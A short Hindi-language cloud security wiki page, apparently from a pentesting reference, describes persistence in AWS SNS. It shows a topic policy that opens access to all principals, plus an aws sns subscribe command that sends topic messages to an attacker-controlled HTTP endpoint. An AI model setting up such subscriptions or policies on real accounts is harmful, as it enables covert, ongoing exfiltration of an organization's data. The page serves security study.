AWS - SNS Persistence

Reading time: 3 minutes

SNS

अधिक जानकारी के लिए देखें:

AWS - SNS Enum

Persistence

जब आप एक SNS टॉपिक बनाते हैं, तो आपको IAM नीति के साथ यह बताना होगा कि किसे पढ़ने और लिखने का अधिकार है। बाहरी खातों, भूमिकाओं के ARN, या यहाँ तक कि "*" को निर्दिष्ट करना संभव है।
निम्नलिखित नीति AWS में सभी को MySNS.fifo नामक SNS टॉपिक में पढ़ने और लिखने की अनुमति देती है:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

Subscribers बनाएं

सभी विषयों से सभी संदेशों को निकालने के लिए हमलावर सभी विषयों के लिए सब्सक्राइबर बना सकता है।

ध्यान दें कि यदि विषय FIFO प्रकार का है, तो केवल SQS प्रोटोकॉल का उपयोग करने वाले सब्सक्राइबर का उपयोग किया जा सकता है।

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>